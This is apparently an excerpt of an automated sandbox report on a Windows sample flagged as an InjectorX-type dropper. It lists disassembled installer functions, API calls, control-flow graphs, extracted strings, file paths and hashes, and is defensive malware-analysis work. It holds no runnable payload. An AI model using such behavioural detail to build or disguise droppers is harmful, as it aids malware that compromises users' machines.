                                            • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                            • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                            Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 0040659A
                                            • FindClose.KERNEL32(00000000), ref: 004065A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Find$CloseFileFirst
                                            • String ID: 8gB
                                            • API String ID: 2295610775-1733800166
                                            • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                            • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                            • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                            • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                            Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 004021BD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CreateInstance
                                            • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                            • API String ID: 542301482-192101639
                                            • Opcode ID: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                            • Instruction ID: 8d58e3acc7b173ba9b06918936dfe92dd1a067fa61399e551ad1d720d45e9931
                                            • Opcode Fuzzy Hash: 891fa9c4e5cabca34a4c7ad1f8027ea32194b00e0f3f0a60056e0d7117170fd1
                                            • Instruction Fuzzy Hash: A64148B5A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44
                                            Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                            • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                            • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                            • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                            Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 195 403d2c-403d35 191->195 193 403eb9-403ece 192->193 194 403e6c-403eb4 GetDlgItem * 2 call 4041e1 SetClassLongW call 40140b 192->194 199 403ed0-403ed3 193->199 200 403f0e-403f13 call 40422d 193->200 194->193 196 403d37-403d44 SetWindowPos 195->196 197 403d4a-403d4d 195->197 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 212 403f18-403f33 200->212 207 403d89-403d8c 201->207 208 403d6f-403d84 DestroyWindow 201->208 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 211 4041ae 205->211 218 403d8e-403d9a SetWindowLongW 207->218 219 403d9f-403da5 207->219 215 40418b-404191 208->215 217 4041b0-4041b7 211->217 213 403f35-403f37 call 40140b 212->213 214 403f3c-403f42 212->214 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->211 222 404193-404199 215->222 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->211 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->211 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 234 403de0-403de1 230->234 235 403de3-403de6 230->235 231->211 231->230 238 403e11-403e16 call 4041ba 234->238 239 403df4-403df9 235->239 240 403de8-403dee 235->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->212 280 404081-404083 269->280 280->212 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->211 284 40409b-4040a1 283->284 284->212 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D44
                                            • ShowWindow.USER32(?), ref: 00403D61
                                            • DestroyWindow.USER32 ref: 00403D75
                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D91
                                            • GetDlgItem.USER32(?,?), ref: 00403DB2
                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DC6
                                            • IsWindowEnabled.USER32(00000000), ref: 00403DCD
                                            • GetDlgItem.USER32(?,00000001), ref: 00403E7B
                                            • GetDlgItem.USER32(?,00000002), ref: 00403E85
                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403E9F
                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EF0
                                            • GetDlgItem.USER32(?,00000003), ref: 00403F96
                                            • ShowWindow.USER32(00000000,?), ref: 00403FB7
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FC9
                                            • EnableWindow.USER32(?,?), ref: 00403FE4
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FFA
                                            • EnableMenuItem.USER32(00000000), ref: 00404001
                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404019
                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040402C
                                            • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404056
                                            • SetWindowTextW.USER32(?,004236E8), ref: 0040406A
                                            • ShowWindow.USER32(?,0000000A), ref: 0040419E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID: 6B
                                            • API String ID: 3282139019-4127139157
                                            • Opcode ID: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                            • Instruction ID: aba62e874285a6ff7dd8be06960963098d8abb6283381b386aa5fa49e43a5191
                                            • Opcode Fuzzy Hash: 63d51f50975af08fe142ac7da96eaef83eb7a6380e3783fe0f342e2b0760fb65
                                            • Instruction Fuzzy Hash: 35C1C071640205BBDB216F61EE88E2B3A6CFB95705F40053EF641B52F0CB3A5992DB2D
                                            Function 0040395A Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 295 40395a-403972 call 406626 298 403974-403984 call 406193 295->298 299 403986-4039bd call 40611a 295->299 308 4039e0-403a09 call 403c30 call 405c25 298->308 304 4039d5-4039db lstrcatW 299->304 305 4039bf-4039d0 call 40611a 299->305 304->308 305->304 313 403a9b-403aa3 call 405c25 308->313 314 403a0f-403a14 308->314 320 403ab1-403ad6 LoadImageW 313->320 321 403aa5-403aac call 40626e 313->321 314->313 316 403a1a-403a42 call 40611a 314->316 316->313 322 403a44-403a48 316->322 324 403b57-403b5f call 40140b 320->324 325 403ad8-403b08 RegisterClassW 320->325 321->320 326 403a5a-403a66 lstrlenW 322->326 327 403a4a-403a57 call 405b4a 322->327 338 403b61-403b64 324->338 339 403b69-403b74 call 403c30 324->339 328 403c26 325->328 329 403b0e-403b52 SystemParametersInfoW CreateWindowExW 325->329 333 403a68-403a76 lstrcmpiW 326->333 334 403a8e-403a96 call 405b1d call 40624c 326->334 327->326 332 403c28-403c2f 328->332 329->324 333->334 337 403a78-403a82 GetFileAttributesW 333->337 334->313 341 403a84-403a86 337->341 342 403a88-403a89 call 405b69 337->342 338->332 348 403b7a-403b94 ShowWindow call 4065b6 339->348 349 403bfd-403bfe call 405383 339->349 341->334 341->342 342->334 354 403ba0-403bb2 GetClassInfoW 348->354 355 403b96-403b9b call 4065b6 348->355 353 403c03-403c05 349->353 356 403c07-403c0d 353->356 357 403c1f-403c21 call 40140b 353->357 360 403bb4-403bc4 GetClassInfoW RegisterClassW 354->360 361 403bca-403bed DialogBoxParamW call 40140b 354->361 355->354 356->338 362 403c13-403c1a call 40140b 356->362 357->328 360->361 366 403bf2-403bfb call 4038aa 361->366 362->338 366->332
                                            APIs
                                              • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                              • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                            • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe",00000000), ref: 004039DB
                                            • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A5B
                                            • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A6E
                                            • GetFileAttributesW.KERNEL32(: Completed), ref: 00403A79
                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea), ref: 00403AC2
                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                            • RegisterClassW.USER32(004291A0), ref: 00403AFF
                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B17
                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B4C
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403B82
                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BAE
                                            • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BBB
                                            • RegisterClassW.USER32(004291A0), ref: 00403BC4
                                            • DialogBoxParamW.USER32(?,00000000,00403D08,00000000), ref: 00403BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                            • API String ID: 1975747703-327696986
                                            • Opcode ID: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                            • Instruction ID: 49200ef38db144648603e0831490e707cb7affae0874970ced47d7304c9e666f
                                            • Opcode Fuzzy Hash: 9009dd5c4e79219ed8b7ac5de4ccd7622ef0cbd3e7ca304b0b87491ac01893d5
                                            • Instruction Fuzzy Hash: D561B970204601BAE330AF669D49F2B3A7CEB84745F40457FF945B52E2CB7D5912CA2D
                                            Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 369 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d3e 372 402f11-402f16 369->372 373 402f1b-402f49 call 40624c call 405b69 call 40624c GetFileSize 369->373 374 4030f3-4030f7 372->374 381 403036-403044 call 402e5d 373->381 382 402f4f 373->382 388 403046-403049 381->388 389 403099-40309e 381->389 384 402f54-402f6b 382->384 386 402f6d 384->386 387 402f6f-402f78 call 4032df 384->387 386->387 394 4030a0-4030a8 call 402e5d 387->394 395 402f7e-402f85 387->395 392 40304b-403063 call 4032f5 call 4032df 388->392 393 40306d-403097 GlobalAlloc call 4032f5 call 4030fa 388->393 389->374 392->389 416 403065-40306b 392->416 393->389 420 4030aa-4030bb 393->420 394->389 398 403001-403005 395->398 399 402f87-402f9b call 405cf9 395->399 406 403007-40300e call 402e5d 398->406 407 40300f-403015 398->407 399->407 418 402f9d-402fa4 399->418 406->407 411 403024-40302e 407->411 412 403017-403021 call 406719 407->412 411->384 419 403034 411->419 412->411 416->389 416->393 418->407 422 402fa6-402fad 418->422 419->381 423 4030c3-4030c8 420->423 424 4030bd 420->424 422->407 425 402faf-402fb6 422->425 426 4030c9-4030cf 423->426 424->423 425->407 427 402fb8-402fbf 425->427 426->426 428 4030d1-4030ec SetFilePointer call 405cf9 426->428 427->407 430 402fc1-402fe1 427->430 431 4030f1 428->431 430->389 432 402fe7-402feb 430->432 431->374 433 402ff3-402ffb 432->433 434 402fed-402ff1 432->434 433->407 435 402ffd-402fff 433->435 434->419 434->433 435->407
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                              • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                              • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
                                            • soft, xrefs: 00402FAF
                                            • C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
                                            • Error launching installer, xrefs: 00402F11
                                            • Null, xrefs: 00402FB8
                                            • Inst, xrefs: 00402FA6
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                            • C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
                                            • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", xrefs: 00402EC1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                            • API String ID: 4283519449-921360449
                                            • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                            • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                            • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                            • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                            Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 441 4062bb-4062c2 439->441 442 4064c6-4064d1 440->442 443 4062c7-4062d4 440->443 441->440 445 4064d3-4064d7 call 40624c 442->445 446 4064dc-4064dd 442->446 443->442 444 4062da-4062e6 443->444 447 4064a7 444->447 448 4062ec-40632a 444->448 445->446 452 4064b5-4064b8 447->452 453 4064a9-4064b3 447->453 450 406330-40633b 448->450 451 40644a-40644e 448->451 454 406354 450->454 455 40633d-406342 450->455 456 406450-406456 451->456 457 406481-406485 451->457 452->440 453->440 463 40635b-406362 454->463 455->454 460 406344-406347 455->460 461 406466-406472 call 40624c 456->461 462 406458-406464 call 406193 456->462 458 406494-4064a5 lstrlenW 457->458 459 406487-40648f call 40626e 457->459 458->440 459->458 460->454 465 406349-40634c 460->465 470 406477-40647d 461->470 462->470 467 406364-406366 463->467 468 406367-406369 463->468 465->454 471 40634e-406352 465->471 467->468 473 4063a4-4063a7 468->473 474 40636b-406389 call 40611a 468->474 470->458 476 40647f 470->476 471->463 477 4063b7-4063ba 473->477 478 4063a9-4063b5 GetSystemDirectoryW 473->478 479 40638e-406392 474->479 480 406442-406448 call 4064e0 476->480 482 406425-406427 477->482 483 4063bc-4063ca GetWindowsDirectoryW 477->483 481 406429-40642d 478->481 484 406432-406435 479->484 485 406398-40639f call 40626e 479->485 480->458 481->480 487 40642f 481->487 482->481 486 4063cc-4063d6 482->486 483->482 484->480 490 406437-40643d lstrcatW 484->490 485->481 492 4063f0-406406 SHGetSpecialFolderLocation 486->492 493 4063d8-4063db 486->493 487->484 490->480 496 406421 492->496 497 406408-40641f SHGetPathFromIDListW CoTaskMemFree 492->497 493->492 495 4063dd-4063e4 493->495 498 4063ec-4063ee 495->498 496->482 497->481 497->496 498->481 498->492
                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004063AF
                                            • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063C2
                                            • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Completed,?,004052E7,Completed,00000000), ref: 004063FE
                                            • SHGetPathFromIDListW.SHELL32(00410EA0,: Completed), ref: 0040640C
                                            • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
